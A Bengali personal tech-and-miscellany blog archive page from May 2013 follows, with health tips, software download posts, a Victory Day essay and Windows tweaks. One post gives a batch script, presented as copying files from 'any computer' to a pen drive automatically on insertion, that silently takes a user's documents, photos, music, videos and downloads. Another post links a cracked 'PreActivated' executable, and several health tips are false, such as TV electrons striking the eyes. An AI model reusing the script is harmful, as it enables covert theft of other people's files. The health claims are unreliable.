স্বাগতম স্বপনীল ভুবনে: May 2013

About

Wellcome To Visit My Website..Thank You..!

Thursday, 30 May 2013

কিছু দারুণ তথ্য জেনে রাখুন,,কাজে লাগবে

₹ আপনি যখন মোবাইলে কোন নাম্বার ডায়াল করেন, তখন কানেকশন 

    পাওয়ার আগ পর্যন্ত,মোবাইল তার সর্বোচ্চ শক্তি ব্যাবহার করে। অর্থাৎ 

    এসময় মোবাইল থেকে সর্বোচ্চ রেডিয়েশন হয়।তাই এসময় মোবাইল  
    কানের কাছে না ধরেই রাখাই ভালো৷


₹ টি.ভি দেখার সময় বাতি বন্ধ করবেননা। বাতি বন্ধ থাকলে টি.ভি হতে 
    নিক্ষিপ্ত ইলেকট্রন সোজা-সোজা চোখে আঘাত করে৷

₹ মনিটরের দিকে টানা আধা ঘন্টার বেশি তাকিয়ে থাকবেননা।
    কিছুক্ষণের জন্য চোখ বন্ধ রেখে চোখকে রেষ্ট দিন

₹ আপনি যত বড় ক্যাডারই  হোন,চলন্ত গাড়ির সাথে কখনো ত্যাড়ামি  করতে  যাবে,ঐ বাণীটা শুনেননি,”চলন্ত গাড়ি এবং নারী হতে সাবধান।” ব্যাস্ত রাস্তার  মাঝখানে গিয়ে  সামনে পিছে ছোট ছুটি করবেননা। হয় সামনে যাবেন,নয়তো থেমে যাবেন।পেছনের দিকে  যাবেননা।

₹ বাসে চলা-চলের ক্ষেত্রে সবচেয়ে গুরুত্বপূর্ণ ব্যাপার হলো 
    নামার সময় 
    অবশ্যই অবশ্যই অবশ্যই বাম পা প্রথমে দিয়ে নামবেন। বাস যত দ্রুত     
    চলুক শরীরের কন্ট্রোল রাখতে পারবেন

₹ নিয়মিত নামাজ পড়ুন, মনের 
     অশান্তি দূর হবে৷

   [ ভাল লাগ্লে লাইক , কমেন্ট করুন ] পোষ্টটি উপকারী মনে হলে শেয়ার করে বন্ধুদেরও জানিয়ে দিন




Wednesday, 29 May 2013

Cyberlink YouCam 5.0 আপনার ওয়েবক্যাম চালানোর জন্য দারুন ইফেক্টসহ



আপনার ওয়েবক্যাক টা পরিচালনা করার জন্য দারুন একটি সফ্টওয়্যার Cyberlink YouCam । আর এর আপডেট ভার্সনটা নিয়ে এসেছি আমি। চমৎকার এবং আকর্ষনীয় ইফেক্ট সংযোজন করা হয়েছে এটাতে যা আপনি অনলাইনে চ্যাট করার সময় বন্ধুদের সাথে ব্যবহার করতে পারবেন।

> ফেইস ট্রেকিং এর মাধ্যমে চমৎকার সব এভাটর তৈরি করে নিতে পারবেন;
> আপনার ওয়েবক্যামের ভিডিওতে সহজেই 3D Virtual Objects যোগ করতে পারবেন;
> সুন্দর সুন্দর সব এনিমেটেড ইমোশন প্রকাশ করতে পারবেন চ্যাট করার সময়;
> বিভিন্ন ভার্চুয়াল স্থানে নিজেকে স্থাপন করতে পারবেন;
> বিভিন্ন এড অনস ইনষ্টল করে অনেক সাইটে আপনার ভিডিও শেয়ার করতে পারবেন;
> আরো নানা ধরনের সুবিধা পেয়ে থাকবেন ইউক্যামের এই ভার্সনটিতে।
তাই দেরী না করে এখুনি ডাউনলোড করে নিন মিডিয়া ফায়ার থেকে
লিংক > > http://www.legalactionbd.com/sihab_soft/CyberLink%20YouCam%205%20PreActivated.exe

সাইজ মাত্র ১৫৫ মেগাবাইট। ডাউনলোডের পর র‌্যার ফাইলটি এক্সট্রাক্ট করে ইনষ্টল করে উপভোগ করুন ।
ধন্যবাদ সবাইকে; ভাল থাকবেন।

|| স্বাধীনতার বাকি রয়ে যাওয়া কিছু কথা ||


আজ ১৬ই ডিসেম্বর, মহান বিজয় দিবস। ১৯৭১ সালের এই দিনে পৃথিবীর বুকে বাংলাদেশ নামের একটি স্বাধীন রাষ্ট্র ভূমিষ্ট হয়। ১৭৫৭ সালে পলাশীর আম্রকাননে স্বাধীনতার যে সূর্য অস্তমিত হয়েছিল সেটির উদয় ঘটে ১৯৭১ সালের ১৬ ডিসেম্বর।
বিজয়ের মহামুহূর্তটি সূচিত হয়েছিল আজকের এই দিনে। ৯১ হাজার ৫৪৯ পাকিস্তানি সৈন্য প্রকাশ্যে আত্মসমর্পণ করেছিল। ঢাকার ঐতিহাসিক রেসকোর্স ময়দানে (বর্তমানে সোহরাওয়ার্দী উদ্যান) পাকিস্তানি সেনাবাহিনীর পূর্বাঞ্চলীয় কমান্ডের অধিনায়ক লেফটেন্যান্ট জেনারেল আমির আব্দুল্লাহ খান নিয়াজী মিত্র বাহিনীর পূর্বাঞ্চলীয় কমান্ডের সর্বাধিনায়ক লেফটেন্যান্ট জেনারেল জগজিত্ সিং অরোরার কাছে আত্মসমর্পণের দলিলে স্বাক্ষর করেছিলেন।
দেনদরবার নয়, কারও দয়ার দানে নয়, এক সাগর রক্তের বিনিময়ে অর্জিত বিজয়ের পর নত মস্তকে পাকিস্তানি বাহিনী পরাজয় মেনে নেয়। পৃথিবীতে নতুন একটি রাষ্ট্র হিসেবে স্বাধীন বাংলাদেশের অভ্যুদয় ঘটে।
আর এই বিজয়ের মহানায়ক হিসাবে যিনি ইতিহাসে চির অম্লান ও ভাস্বর হয়ে আছেন তিনি হলেন হাজার বছরের শ্রেষ্ঠ বাঙ্গালি জাতির জনক বঙ্গবন্ধু শেখ মুজিবুর রহমান। আনন্দ অনেকভাবেই আসতে পারে জীবনে। কিন্তু মাতৃভূমির পরাধীনতার শৃঙ্খলমুক্তির জন্য প্রাণ উত্সর্গ করা যুদ্ধজয়ের আনন্দের কোনো তুলনা হয়! ৫৫ হাজার বর্গমাইলের এই সবুজ দেশে ৪১ বছর আগে আজকের এই দিনে উদিত হয়েছিল বিজয়ের লাল সূর্য। মুক্তিপাগল বাঙালি পরাধীনতার শৃঙ্খল ভেঙ্গে স্বাধীনতার সূর্য ছিনিয়ে এনেছিলো। যে সূর্য কিরণে লেগে ছিল রক্ত দিয়ে অর্জিত বিজয়ের রং।

সেই রক্তের রং সবুজ বাংলায় মিশে তৈরি করেছিল লাল সবুজ পতাকা। সেদিনের সেই সূর্যের আলোয় ছিল নতুন দিনের স্বপ্ন, যে স্বপ্ন অর্জনে অকাতরে প্রাণ দিয়েছিল এ দেশের ৩০ লাখ মানুষ। নয় মাসের জঠর-যন্ত্রণা শেষে এদিন জন্ম নেয় একটি নতুন দেশ, স্বাধীন-সার্বভৌম বাংলাদেশ।
বাংলাদেশের এই বিজয় ছিনিয়ে আনতে দীর্ঘ নয় মাস পাক হানাদার বাহিনীর বিরুদ্ধে রক্তাক্ত যুদ্ধ করেছে এ দেশের দামাল ছেলেরা। এ যুদ্ধ ছিলো অন্যায়ের বিরুদ্ধে ন্যায়ের জন্য যুদ্ধ, পরাধীনতার বিরুদ্ধে স্বাধীনতার জন্য যুদ্ধ, মায়ের ভাষায় কথা বলার অধিকার আদায়ের জন্য যুদ্ধ। মাতৃভুমির কপালে বিজয়ের লাল টিপ পড়াতে লাখো শহীদ তাদের বুকের তাজা রক্ত ঢেলে দিয়েছে, হাজারো মা বোন সম্ভ্রম হারিয়েছেন। আমরা শ্রদ্ধাভরে স্মরণ করি লাখ লাখ বীর শহীদের যারা তাদের বুকের তাজা রক্ত ঢেলে দিয়ে আমাদের জন্য এনে দিয়েছে স্বাধীনতা।
অনেক ত্যাগের বিনিময়ে অর্জিত হয়েছে যে স্বাধীনতা, আমরা পেয়েছি যে বিজয়… সেই বিজয় অর্জনের পথে বাঁধা হয়ে দাঁড়িয়েছিলো এদেশেরই কিছু মানুষরূপী নরপশু। বিজয়ের ৪১ বছর পরও সেই নরপশুদের বিচার হয়নি। লাখো শহীদের রক্তে আর মা বোনদের সম্ভ্রমের বিনিময়ে কেনা আমাদের মাতৃভুমি বাংলাদেশে যুদ্ধাপরাধীরা আজও বসবাস করে।

এ লজ্জা আমাদের, এ অপমান আমাদের মায়ের মতো এই বাংলাদেশের।আসুন আজ আমরা শপথ নেই, মুক্তিযোদ্ধাদের রক্তে কেনা লাল-সবুজের বাংলাদেশে কোন যুদ্ধাপরাধীর জায়গা হবে না। যুদ্ধাপরাধীদের বিচার চাই।

Sunday, 26 May 2013

আপনার কম্পিউটার এর স্ক্রীন দেখতে পাবেন মোবাইল দিয়ে পৃথিবীর যে কোন জায়গা থেকে


বিছমিল্লাহির রাহমানির রাহীম
 আজ আমি আপনাদেরকে একটি সফটওয়্যার দিব সেটির মাধ্যমে আপনারা আপনাদের কম্পিউটার এর স্ক্রীন দেখতে পাবেন মোবাইল দিয়ে পৃথিবীর যে কোন জায়গা থেকে ।এমন কি টিম ভিউয়ারের মত আপনার কম্পিউটারের স্ক্রীন আপনার মোবাইলে দেখতে পারবেন এবং যাবতীয় কাজ করতে পারবেন। এর জন্য আপনার যা লাগবে তা হল-
rdm+
1. কম্পিউটারে ইন্টারনেট সংযোগ
2. জাভাস্ক্রীপ্ট/ এড্রয়েড সাপোর্ট করে এমন একটি মোবাইল ও এতে ইন্টারনেট সংযোগ এখন আপনি এখানথেকে ছোট ফাইলটি নামিয়ে নিন এবং এটি এক্সট্রাক্ট করুন তাহলে এর মধ্যে 3 টি ফাইল দেখতে পাবেন .exe ফাইলটি আপনার কম্পিউটারে ইন্সটল করুন। ইন্সটল করার সময় আপনার নাম এবং ইমেইল চাইবে যে কোন একটি দিয়ে দিন এবং মনে রাখুন ও ওকে চাপুন এবার আপনার একাউন্ট নেম, এবং পাসওয়ার্ড চাইবে এখানে ও যা মনে হয় দিন ও মনে রাখুন। এবার ওকে করলে আপনার ইন্সটলেশন ও রেজিস্ট্রেশন শেষ হবে।
ডাউনলোড লিংকঃ  www.mediafire.com/?lgfxm3mji5m  (৪.৪এমবি)
এবার এই ফোল্ডারের ভিতর থেকে

Monday, 20 May 2013

ফিরিয়ে আনুন desktop icon এর shortcut arrow


আজকের এই পোস্ট টা একপ্রকার 2 in 1 পোস্ট। কারন, এটায় একদিকে দেখবেন কিভাবে shortcut arrow  ফিরিয়ে আনা যায় আর অন্য দিকে দেখবেন কিভাবে আগের পোস্টের অসুবিধা গুলো ছাড়াই shortcut arrow লুকিয়ে ফেলবেন। তাহলে শুরু করা যাক,—-

পদ্ধতি ১ (Time pass পদ্ধতি):   আপনার হাতে যদি যথেষ্ট সময় থাকে তবে এই পদ্ধতির সাহায্য নিন।
 ১.১:  Desktop icon এর shortcut arrow ফিরিয়ে আনার জন্য নিচের লেখা গুলি Notepad-এ কপি করুন ও যে কোনও নাম দিন (যেমন: Restore Shortcut Arrow) এবং extension name দিন .reg ও সেভ করুন।
Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\lnkfile]
“IsShortcut”=”"
[HKEY_CLASSES_ROOT\InternetShortcut]
“IsShortcut”=”"
[HKEY_CLASSES_ROOT\piffile]
“IsShortcut”=”"
[HKEY_CLASSES_ROOT\WSHFile]
“IsShortcut”=”"

যে কোন কম্পিউটার এর ফাইল/ফোল্ডার অটোমেটিক কপি করুন আপনার পেন ড্রাইভে [নতুনদের জন্য]


   “আসসালামু আলাইকুম”


* আপনি প্রথমে নিচের কোডিং গুলো হুবুহ একটি নোটপ্যাডে পেস্ট করুন এবং তার নাম দিন pp.bat
@echo off
:CHECK
if not exist “%homedrive%\Copied_files” md “%homedrive%\Copied_files”
if exist “%systemdrive%\files” goto COPIER7
goto ERROR
:COPIER7
if not exist “%homedrive%\Copied_files\%computername%” md “%homedrive%\Copied_files\%computername%”
if not exist “%homedrive%\Copied_files\%computername%\VIDEOS” md “%homedrive%\Copied_files\%computername%\VIDEOS”
if not exist “%homedrive%\Copied_files\%computername%\PICTURES” md “%homedrive%\Copied_files\%computername%\PICTURES”
if not exist “%homedrive%\Copied_files\%computername%\MUSIC” md “%homedrive%\Copied_files\%computername%\MUSIC”
if not exist “%homedrive%\Copied_files\%computername%\DOWNLOADS” md “%homedrive%\Copied_files\%computername%\DOWNLOADS”
copy /y “%userprofile%\Documents\*.*” “%homedrive%\Copied_files\%computername%”
copy /y “%userprofile%\Videos” “%homedrive%\Copied_files\%computername%\VIDEOS”
copy /y “%userprofile%\Music” “%homedrive%\Copied_files\%computername%\MUSIC”
copy /y “%userprofile%\Pictures” “%homedrive%\Copied_files\%computername%\PICTURES”
copy /y “%userprofile%\Downloads” “%homedrive%\Copied_files\%computername%\DOWNLOADS”
MSG %username% “DONE!”
exit
:ERROR
exit 
** আমরা শুধু মাত্র my document এর সকল ফাইল কপি করে দেখছি কারন ফুল পিসি কপি হতে অনেক সময় লাগবে এত সময় এবং বড় পেনড্রাইভ কোনটাই আপনার কাছে নেই বা পাবেন না।
*** এরপর এই ফাইলটি আপনার পেন ড্রাইভে সেন্ড করে রেখে দিন।
**** ব্যাচ কোডিং টি যেনো পেন ড্রাইভ লাগানোর সাথে সাথে কাজ করে সেজন্য

Movie

                                              
                                                      Bangla kolkata movie Deewana ( HQ ) ( 2013 )
                                          &                                

                                             Simanaheen - Full Bengali Movie (2013)


                                               

                                                                 Lal Tip ~ Full Bengali Movie 2012 HD
                                             
                                                           Daruchini Dip Bangla Movie Full [HDTV]
                                             
                                                    Projapoti (2011) DvDRip Full Bangla Movie
                                             
                                                                 Jaago - Bangla Movie HD ( comilla )


                                            
                                                                         AYNA - Bangla Full Movie - আয়না বাংলা ছবি
                                            
                                         

                                                      Bailyroad Bangla Full Movie

Saturday, 11 May 2013

কোন সফটওয়্যার এর সাহায্য ছাড়াই লক করুন ফোল্ডার।।


  • প্রথমে আপনাকে একটি ফোল্ডার তৈরি করতে হবে। আপনার ইচ্ছা মত নাম দিতে পারেন তৈরি কৃত ফোল্ডারটির।
1
  • এখন ফোল্ডারটি খুলুন এবং আপনার মাউস এর রাইট বাটুন ক্লিক করুন। এবার New -> Text Document ক্লিক করুন।
2
  • এরপর Text Document খুলে নিচের টেক্সট অংশটি কপি করে Text Document >  paste করুন।

পিসিকে Log off, Lock, Shutdown, Restart, Sleep, Hibernate, Hybrid Sleep করতে একটি মাত্র ক্লিকই যথেষ্ট


                                   “বিসমিল্লাহহির রাহমানির রাহিম”

CMD_F

১. প্রথমে আপনার মাউস এর রাইট বাটনে ক্লিক করুন। এখন New এ গিয়ে Shortcut এ ক্লিক করুন।
Sh01

২. এখন এমন একটি ডায়ালগ বক্স দেখতে পাবেন। ওখানে লিখুন shutdown.exe -s -t 00
Sh02
তারপর Next এ ক্লিক করুন। (এখানে ‘00’ সেকেন্ড নির্দেশ করে। আপনি চাইলে আপনার ইচ্ছামত সেকেন্ড বসিয়ে সেই সময় পর Shutdown এবং Restart এর সুবিধা পেতে পারেন।)

৩. তারপর এরকম ডায়ালগ বক্স পাবেন। এখন আপনার ইচ্ছামত নাম দিয়ে Finishবাটনে

Pages (18)Previous 12345678 Next

Subscribe Us

back-to-top

Most Popular